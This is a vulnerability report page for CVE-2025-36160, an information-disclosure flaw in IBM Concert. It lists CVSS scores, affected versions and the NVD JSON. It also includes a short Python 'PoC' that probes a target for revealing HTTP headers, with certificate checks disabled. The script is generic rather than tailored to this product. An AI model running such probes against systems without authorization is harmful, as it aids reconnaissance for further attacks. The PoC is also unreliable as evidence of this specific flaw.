Security Vulnerability Report
中文
CVE-2025-36160 CVSS 5.3 MEDIUM

CVE-2025-36160

Published: 2025-11-20 22:15:58
Last Modified: 2025-11-21 19:46:50

Description

IBM Concert 1.0.0 through 2.0.0 could disclose sensitive server information from HTTP response headers that could aid in further attacks against the system.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE
IBM Concert 1.0.0
IBM Concert 1.1.0
IBM Concert 1.2.0
IBM Concert 1.3.0
IBM Concert 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-36160 PoC - Information Disclosure via HTTP Response Headers # Target: IBM Concert 1.0.0 - 2.0.0 # Description: Server discloses sensitive information in HTTP response headers def check_cve_2025_36160(target_url): """ Check if target is vulnerable to CVE-2025-36160 This vulnerability allows attackers to gather sensitive server information from HTTP response headers which could aid in further attacks. """ sensitive_headers = ['Server', 'X-Powered-By', 'X-AspNet-Version', 'X-AspNetMvc-Version', 'X-Generator', 'X-Drupal-Cache'] try: response = requests.get(target_url, timeout=10, verify=False) headers = response.headers print(f"[*] Target: {target_url}") print(f"[*] Status Code: {response.status_code}") print("\n[+] Checking for sensitive headers:") vulnerable = False for header in sensitive_headers: if header in headers: print(f" [!] {header}: {headers[header]}") vulnerable = True if vulnerable: print("\n[+] Target may be vulnerable to CVE-2025-36160") print("[+] Sensitive server information disclosed in response headers") return True else: print("\n[-] No sensitive headers detected") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-host/" check_cve_2025_36160(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36160", "sourceIdentifier": "[email protected]", "published": "2025-11-20T22:15:57.530", "lastModified": "2025-11-21T19:46:50.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.0.0 could disclose sensitive server information from HTTP response headers that could aid in further attacks against the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.1.0", "matchCriteriaId": "43072AC2-05A5-41A3-9E79-E0AF2C5AD3FF"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252019", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}